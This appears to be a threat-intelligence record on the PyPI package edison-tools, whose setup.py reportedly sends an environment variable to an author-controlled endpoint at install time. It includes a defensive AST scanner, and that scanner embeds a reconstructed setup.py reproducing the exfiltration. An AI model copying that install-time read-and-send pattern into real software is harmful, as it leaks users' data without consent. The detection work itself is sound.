Supply-chain threat intelligence
Risk score
92
Indexed incident for edison-tools (pypi).
-= Per source details. Do not edit below this line.=-
At pip install time, setup.py reads the EDISON_QUERY environment variable from the installer's environment and POSTs its value to https://edison-k8.vercel.app/query, an author-controlled Vercel endpoint that proxies requests to Google Gemini. The HTTP response is written verbatim into edison_tools/data.py and exposed through the package's public query() API.

Two distinct harms follow. (1) Install-time: outbound network traffic with no opt-in, carrying whatever value the user has placed in EDISON_QUERY to the author's infrastructure. (2) Runtime: the advertised query() function silently relays caller-supplied prompts through the author's hardcoded Vercel endpoint, so every consumer of the API funnels its queries, and any sensitive content in them, through the author's account, where they can be logged or modified. The destination, model selection and account credentials are not configurable; the relay is the package's only mechanism. This matches the silent-relay pattern: normal use of the documented API leaks caller-supplied data to a hardcoded third-party destination.
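A static check for the install-time pattern described above, as an added example that is not part of this record or of the package itself: it parses a setup.py with Python's ast module and flags environment-variable reads, outbound network calls, hardcoded URLs and file writes, then classifies the combination. The sample setup.py below is constructed here to mirror the described behaviour; the JSON body shape sent to the endpoint and the exact contents written to data.py are assumptions, not recovered from the package. The same scanner can be pointed at the package's runtime modules to surface the hardcoded relay URL.

```python
import ast
from dataclasses import dataclass, field

# Call prefixes that indicate outbound network activity.
NETWORK_PREFIXES = ("requests.", "urllib.request.", "urllib3.", "http.client.", "httpx.", "socket.")
ENV_ACCESSORS = {"os.environ.get", "os.getenv"}

# Constructed sample mirroring the described edison-tools setup.py behaviour.
# The JSON body shape and the data.py contents are assumptions for illustration.
SUSPECT_SETUP_PY = '''
import os
import requests
from setuptools import setup

prompt = os.environ.get("EDISON_QUERY", "")
resp = requests.post("https://edison-k8.vercel.app/query", json={"prompt": prompt})
with open("edison_tools/data.py", "w") as fh:
    fh.write("RESPONSE = " + repr(resp.text))

setup(name="edison-tools")
'''

# Constructed benign control: no env reads, no network, no writes.
BENIGN_SETUP_PY = '''
from setuptools import setup, find_packages
setup(name="example-pkg", packages=find_packages())
'''


@dataclass
class Findings:
    env_reads: list = field(default_factory=list)      # env var names read
    network_calls: list = field(default_factory=list)  # dotted names of network calls
    urls: list = field(default_factory=list)           # hardcoded http(s) string literals
    file_writes: list = field(default_factory=list)    # paths opened for writing


def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _const_str(node):
    return node.value if isinstance(node, ast.Constant) and isinstance(node.value, str) else None


def scan_python_source(source):
    """Walk the AST once and collect the indicators relevant to install-time abuse."""
    findings = Findings()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in ENV_ACCESSORS and node.args and _const_str(node.args[0]):
                findings.env_reads.append(_const_str(node.args[0]))
            elif name and name.startswith(NETWORK_PREFIXES):
                findings.network_calls.append(name)
            elif name == "open":
                mode = _const_str(node.args[1]) if len(node.args) > 1 else None
                for kw in node.keywords:
                    if kw.arg == "mode":
                        mode = _const_str(kw.value)
                path = _const_str(node.args[0]) if node.args else None
                if path and mode and set(mode) & set("wax+"):
                    findings.file_writes.append(path)
        elif isinstance(node, ast.Subscript) and dotted_name(node.value) == "os.environ":
            key = node.slice
            if type(key).__name__ == "Index":  # Python < 3.9 wraps the index node
                key = key.value
            if _const_str(key):
                findings.env_reads.append(_const_str(key))
        elif _const_str(node) and node.value.startswith(("http://", "https://")):
            findings.urls.append(node.value)
    return findings


def classify_install_time(findings):
    """setup.py executes when pip builds from an sdist, so anything found here runs at install time."""
    if findings.env_reads and findings.network_calls:
        return "install-time exfiltration candidate"
    if findings.network_calls:
        return "install-time network activity"
    return "no install-time network findings"


if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        f = scan_python_source(src)
        print(label, classify_install_time(f), f)
```

URL literals on their own are noisy (a legitimate setup() commonly carries a url= keyword), which is why the verdict keys on an environment read combined with a network call rather than on the URL list; the URL and file-write lists are there to give the analyst the destination and the dropped artifact once a hit fires.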
Affected versions
Indicators
Timeline